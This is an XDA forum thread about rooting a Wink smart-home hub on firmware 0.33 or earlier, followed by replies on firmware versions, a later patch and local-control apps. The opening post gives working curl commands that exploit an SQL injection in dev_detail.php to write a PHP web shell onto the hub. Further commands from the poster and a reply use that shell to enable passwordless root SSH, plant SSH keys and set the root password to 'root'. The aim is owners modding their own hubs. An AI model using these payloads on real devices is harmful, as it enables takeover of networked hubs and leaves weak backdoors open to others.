FORUMS
Remove All Ads from XDA

Wink Hub root

45 posts
Thanks Meter: 29
 
By FreeFly, Member on 10th December 2014, 09:47 PM
Post Reply Email Thread
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

First use a curl command to exploit a SQL injection vulnerability to create a php file used to execute shell commands on the hub:
Code:
curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('<?php passthru(' || char(36) || '_POST[' || char(39) || 'cmd' || char(39) || ']); ?>');--" http://192.168.0.1/dev_detail.php
Now you can supply shell commands to the exploit.php.

If you don't want to mess with ssh keys, now you can run this command to enable root login without using a password. My recommendation would be to immediately ssh in and use the passwd command to change the root password.

Code:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart%3Becho%20-e%20%22%5Cn%5Cn%22%20%7C%20passwd' http://192.168.0.1/exploit.php
For those who don't mind using ssh keys, or want to run other commands:

On the machine I want to copy my ssh key to root so I'd run something like this:
Code:
echo MySSH_PublicKey > /root/.ssh/authorizedkeys
It would be nice if you could just call:
Code:
curl -d cmd='echo MySSH_PublicKey > /root/.ssh/authorizedkeys'
But that won't generally work because of http issues. The key is to urlencode the cmd you want to run using a site like http://meyerweb.com/eric/tools/dencoder/
Just urlencode the bits between the single quotes, the php exploit won't work without the single quotes.

So after getting the urlencoded command I actually invoke:
Code:
curl -d cmd='echo%20MySSH_PublicKey%20%3E%20%2Froot%2F.ssh%2Fauthorizedkeys' http://192.168.0.1/exploit.php
Then you can happily ssh as root to the wink hub!
 
 
10th December 2014, 09:50 PM |#2  
Senior Member
Thanks Meter: 48
 
More
Quote:
Originally Posted by FreeFly

Then you can happily ssh as root to the wink hub!

FIRST REPLY!

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

https://github.com/nashira/blink

10th December 2014, 10:36 PM |#3  
Junior Member
Thanks Meter: 0
 
More
This awesome. Thanks for the great work
10th December 2014, 11:05 PM |#4  
Junior Member
Thanks Meter: 0
 
More
Nice work. This will make things much easier.

Some people (people running Windows for instance) are having issues generating the ssh keys. As a suggestion, can we incorporate the below so that people can just login as root using a password? I believe this would make things even simplier.

Code:
#commands to allow root login using root as password
sed -i 's/=-sg/=/' /etc/default/dropbear;/etc/init.d/S50dropbear restart
echo -e 'root\nroot' | passwd
I don't have enough post to provide the exact command, but it should be something like:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2F etc%2Finit.d%2FS50dropbear%20restart' hxxp/ipaddress/exploit.php
curl -d cmd='echo%20-e%20%22root%5Cnroot%22%20%7C%20passwd' hxxp/ipaddress/exploit.php
11th December 2014, 12:51 AM |#5  
Junior Member
Thanks Meter: 0
 
More
Quote:
Originally Posted by FreeFly

Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

Very nice!

I started lookng for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloding the app-rootfs.ubi manually and using ubiformat to flash it on.

However in the official Wink app its still showing me version 0 I've been wading through the upgrade scripts to see where it set's version 33 its in /database somehere If you could take a look at your device and let me know I'd very much appreciate it.

I also have a pretty good script that downloads the update re-exploits the update before it installs the update with ubiformat. There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"

If anyone has setup a kidde smoke alarm via aprontest let me know I have had much luck as of yet. I'll certainly post if I make some headway.
11th December 2014, 01:09 AM |#6  
Junior Member
Thanks Meter: 0
 
More
Quote:
Originally Posted by berserko

Very nice!

I started lookng for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloding the app-rootfs.ubi manually and using ubiformat to flash it on.

However in the official Wink app its still showing me version 0 I've been wading through the upgrade scripts to see where it set's version 33 its in /database somehere If you could take a look at your device and let me know I'd very much appreciate it.

I also have a pretty good script that downloads the update re-exploits the update before it installs the update with ubiformat. There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"

If anyone has setup a kidde smoke alarm via aprontest let me know I have had much luck as of yet. I'll certainly post if I make some headway.

Here are the files that report the versions to the app.

echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.33" > /database/cf_fver3
11th December 2014, 01:52 AM |#7  
Junior Member
Thanks Meter: 0
 
More
Quote:
Originally Posted by berserko

There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"

Someone over at slickdeals did but doesn't look like there is anything happening over there yet. He's got some links but that is about it.

homeautomation proboards com/board/3/wink-hub

---------- Post added at 01:52 AM ---------- Previous post was at 01:16 AM ----------

Quote:
Originally Posted by FreeFly

Then you can happily ssh as root to the wink hub!

It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?
11th December 2014, 03:02 AM |#8  
OP Member
Thanks Meter: 29
 
Donate to Me
More
Quote:
Originally Posted by nyvram1

We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.
11th December 2014, 03:21 AM |#9  
Junior Member
Thanks Meter: 0
 
More
Unhappy 00.47 is out and this particular sql injection has been closed
00.47 is out and this particular sql injection has been closed
11th December 2014, 04:21 AM |#10  
Junior Member
Thanks Meter: 0
 
More
Quote:
Originally Posted by nyvram1

FIRST REPLY!

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

I'm also interested in Nashira's project, but I'm looking to use his work to figure out how to send commands from a Raspberry Pi that will be the equivalent of pushing a light-on button on the Android app. Being able to issue commands to the wink by running a python script, for example, would open up the hub to be used in conjunction with lots of home automation platforms. I have a bunch of cheap Arduino sensors integrated with an open source home automation system that is much more flexible than Wink, so I'd just like to use the Wink hub for its radios.

It looks like you can do a HTTP post to mimic a button push, but that's something I'm not familiar with. If someone has any insights, I'd appreciate it.

---------- Post added at 05:21 AM ---------- Previous post was at 05:13 AM ----------

Quote:
Originally Posted by FreeFly

BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.

Hey, that's what I'm interested in too. Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?

Quote:
Originally Posted by qnology

00.47 is out and this particular sql injection has been closed

Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.
11th December 2014, 12:45 PM |#11  
OP Member
Thanks Meter: 29
 
Donate to Me
More
Quote:
Originally Posted by automonkey

It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?

Did you try the passwordless method?
Post Reply Subscribe to Thread

Guest Quick Reply (no urls or BBcode)
Message:
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes